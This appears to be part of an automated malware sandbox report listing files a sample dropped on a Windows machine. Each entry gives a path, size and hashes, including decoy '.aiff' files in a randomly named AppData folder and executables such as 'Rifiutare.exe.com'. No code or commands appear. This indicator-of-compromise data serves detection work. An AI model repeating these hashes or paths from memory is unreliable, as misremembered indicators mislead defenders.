SHA1fe6f22a7dd8a2c7fa0773c4b72dd3f9f7816ed9c
SHA256c8ce2aecc0a473f362744dd777ad82bb9cec57d78bd43c6b7e9ec4f3bac48f39
SHA5122e35bb2a48777188edfec252e33a233a92304e31e31fdb22294e09cef5a756b0da3821ca6206083632aef753a52f6873b18a0f6e002f6abb364e623aa06e67ff
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b76f7a487dcc410c367e9e015083809b
SHA11d1fd36aaf40e18c58ca432f9fa5d8208b18d55c
SHA256d7f44c5f8d68f58223a328cc548c2a75c6a462654e8c0177879c3167100f8365
SHA512204950af3a20628e01980c405ef9de3abee47c8fadddb61a6841bbba78082175f8f34e1589bfee37e5a2148e0611e9d2ff0a1c1ea97c59e60b8020fb3aedf3e0
-
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Adunazione.aiff
Filesize148KB
MD526d71780d392b15532aed9e37216f162
SHA14ebe507d17371eba5c6885bfcdad1ee3358747e3
SHA256a6cc34f6068c12b795875fc277023d533e35e4c9a6e042b37c1b9dedb84829cc
SHA51283c433ddad2b24ffbd1ebe8056d0742f5ce4d9998e6f6a1f50621ab37b0e4378373f692f134edc65719f9ffb2ec820153c5fa38cfb1bdf92aa38a41aa728ebc2
-
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Amo.aiff
Filesize353KB
MD519c1bac572edf51745b04e858508c2a8
SHA15629a972d32cc955f6c22aefb4832cc30cc24b8a
SHA256f9d52f9539bc9007576369869760d889bc4ea31c641ea051cf6bc496ce58497b
SHA5127384cf38339a58bc9c077de3394f34c6a286b47d9a59b48bd1171b2964835281aececdf0ac10193415d0d963baf46c1064ed47312ce658b6f0b22d94e6fd1fc4
-
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Bel.aiff
Filesize88KB
MD5e4f38ada217f47c7acf0b1a0c7d86c59
SHA1c8bc4db75803e0464de7abf074af05b7538957ca
SHA256ee6a09a3252b0b091b9974bf2809ac6150799a62f3656482b324348a9eb0cb05
SHA5120cc645f178528121f8f05bcddedfef9ab3b23f018f100de1096dcc63816c2684f70de24d0b1a60af4d944cc4b39402a3532815d99760776f9ffa5c71a84a5430
-
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Cio.aiff
Filesize1004KB
MD5d353f3670fcc64603b64c0a6cca90928
SHA11d354a3469a77aa085eb2a71463f86a5e3a28ab6
SHA256017bf1d9ba8d0d162bc99fd78d5c8a84da0221b1a4864f177cca26aef3ab3c42
SHA51225cb7776906bf4b885ce5fb794397367ac23157db460b3747f320c3af7d6c9dca3c1814b5d7b3c863726867a748d01ecccd0cd64c2fec0bb1b81886d0078c087
-
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Mantenere.aiff
Filesize1.8MB
MD5320e70e313b3d2e1fbccb281ee8b30bc
SHA1fab977083428cf69106eae435d08bcfb35899da1
SHA25637d7beb2569830b9e05f0a7dac9b575d458afaa726ded46f48d238cefae444b2
SHA512cb736a790fcb7ae09a43f8a33e316fdc96ca1f8b0a508d8e2f4ceeb72429961e13fdc155d8900714efbd5995e43a0887ac873da0f84d03cbb128311750e550da
-
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Raccontero.aiff
Filesize921KB
MD558b5bf5a115de982ecf7842c982d6dbd
SHA1c85d93bac730b5e3b4b521ce49f79737890ab878
SHA2562dd1bdea2c23fec46072a83756ffb2930319b9127536d3177b01444936383992
SHA51218927f97537a1b33ca0e2d1c6c4f70a38d5e14fff4e193f66b3b81a2bf9e5163370695762e11653b2765acdc70d80cca582d985114ef6e5657d199311cbdd757
-
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Sparvieri.aiff
Filesize1018KB
MD5eba2da2ccb2a92b10e917608f89f8758
SHA1232c57cd8baa2a2017c87274460f3a0b94e1ea33
SHA256d70efdcff9ece6dba302999cf7121cebb2625a0a8630977adffa0afdb5af589f
SHA512aedea7fa624a3e05c554ea41c70d7374e8df0532293768101e9b3ff23aa17f0d386246a90f0063222d225a00b2df74a312c97cdc5df3b19912aa07042f515ae7
-
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Tenue.aiff
Filesize923KB
MD5e24236c89ce12eeeb9cfa655716d2994
SHA16b5869c4a43de9c394284b5657c6709063b530bf
SHA256de29e32ce6e527b952adf8d584648c5b5a6805645589e4ac9287bd5481eb5306
SHA51203a58fbf1e6d7433a4493b567f6e8ff0a740721b50d8ca5776dcd14218a9c0ef84877391973cc3f6702b415c3ea4e549c9f9a88859e0b30f83a3dd4ce8aeafd6
-
Filesize
9KB
MD5c3d2e2ccd47e66fba54c582bf5b09a2c
SHA1176455067dcc15e2cc309acc25a012d23326efbd
SHA256c8b96c7092dd44a961562790bb1712012ddfd6f6764ac6a57ed0075fb1e832c4
SHA512d57634cbebbd14070813c779d7e1e7d3ce3c5449bb0189176e601237e5d8a9a92980df1f18d0f8898f3a5541f32104b4f89d1645a0cb355e7b60f90ff2711628
-
Filesize
2KB
MD5d427d2ed9db86d08b38f5f8b5eec4493
SHA15cfe9f751bad99009abf1a642eec8f7c67870051
SHA2567d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512
SHA512fc381ec4b2dcdfd10d55d5d317e7a6011da9a859a7e98a84d49391637aa22eaf983875c9bf5bad8403b006566d4053d8f8946d3cbd52a433eac60c26f73cf659
-
Filesize
2KB
MD50884b6e1aaf279208fe5f97cbfa85276
SHA1388f310a0d62a3362db22659e93cb6cb517c21b8
SHA256490c84854174fa43f15d9ca2967578ed5aa614f5327ccccb5cb6ba589db3aeb6
SHA51268d515e3660306e7e6c7a5661b41232e6a19788ef05d614962f64873056dcc8a5489c4d1ac22ad2e3f632d6c4e7497a40d0511527f0ac1a8e0dff7366731eead
-
Filesize
2KB
MD5193242114c1738d0ea04aa93659fdd5a
SHA1a929cc1cfbe44ba8a99117dfd7819776ab45d465
SHA256c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928
SHA51246825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4
-
Filesize
1KB
MD56d19b2702b77a20b89818484cbc83506
SHA1f42dbd3ab3c60ea9952e2a0f66826e153f89d943
SHA256042ef6e3349edef436e425a5ec5d7c23f49a93f2866ae31c10ada08e9e012d5f
SHA512184e47c8aaa2e8a391e08ba2c5932c6a16b620303c4c985df9e149770a866e8e3948a027150070044cdb56adfb11ad8b8cbd5979e78a0fbf444868cab9b4a285
-
Filesize
938B
MD51ba9b30fa9eee2040226473ab80eb4bb
SHA1f060713a1dc19fa8cac2416e620222d009fb4714
SHA256abbc6c945afc36251c13a898048f376db578ff1c87124727912b84e1cc37ebf6
SHA512e9aba054bea4f893ae3276b2178767cb8aac13bfbd8003457143117ca8fc58665c928d8f44c6220e35112a7b191a1c484630576e4d1e8678409ba74504d9d2c0
-
Filesize
835B
MD500f205246d2960889e788e2d7d4e003d
SHA1d86af664a46fbf5f7355851dcd537f00e57642e5
SHA2567d4dd8e9ce0f899789edf15649f4b945809f0d0d532bed170bba52c85330da22
SHA51275ac884dea61d7bcf7004c15cf847305ee73f95b8989eb643eda99666d06d1177f1235bca3c471bd2af67d9dc789b87b32535bd7cb17ac206d15c7ba3adbb749
-
Filesize
1KB
MD50224f96e41e5d65aa1c474f8523f3f9d
SHA1a973d71032220b906c9d40ca728f883038afccb2
SHA2564773920dcbb52446a8b9dd860588ce59970bd1e67a2ae27bbafaded427c972a2
SHA512eb6de22df8505a5ecd83728b4ae8709b6a05b83c14fbcab748736dc690f09a1108297e537c1fbc78300d6b6151eea688b656578814f122e2228ac48c5cd54d06
-
Filesize
64KB
MD5309139ec40ae4f1cbb69f35596c690e7
SHA1c59adb15504e0d1f3f647346dcca05c19234718d
SHA25653bc05761c3e6909e036217e7c62bcc3f957f490f12e0efe8b6f238a777e2926
SHA5126dab9d807e54d611c20380fe92743b1789f0ab99f63c762153a6c5a7a2c25217a970c7a8247c085f7a820a7932a9023e4e2e380d95a32a2741c0477372d126a8
-
Filesize
1KB
MD588451d4b5458a06093eb903549ee7bb5
SHA1fd2c9b3c674f597b8bcde4665791f2e6309c320f
SHA256b32619aac20598fb47422989746bb8e254d1d4dd76ed817dc219d6b3b70230b7
SHA5122f1e70ccf842241675f392457e444d2606e68eaf1643917a4e80a65ee99a29793e491bc5290e8bc6cee8419af4aab44a356f2bcb1e612d4d1cb8a070dba31883
-
Filesize
1KB
MD50a3942c503f2ab867feb9bc3f24b0e2f
SHA15f654a353b355ef3e33fc96bfd5130550d4492ac
SHA256cf817cac19c8be794c0a1216595584c5005da728b0390b40f2ae45f2a2533aa1
SHA512a08222d9d0bd75cfe452753403244ca7710a1e5e8f7dd9b293e6d1162ae12b70a71ccc2fcb42c2b3e96d9ddfde157c5871ea44e66b55431cc6648ec6835fdf6c
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
Filesize63KB
MD5b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA2566e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab
-
\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
Filesize921KB
MD578ba0653a340bac5ff152b21a83626cc
SHA1b12da9cb5d024555405040e65ad89d16ae749502
SHA25605d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7
SHA512efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317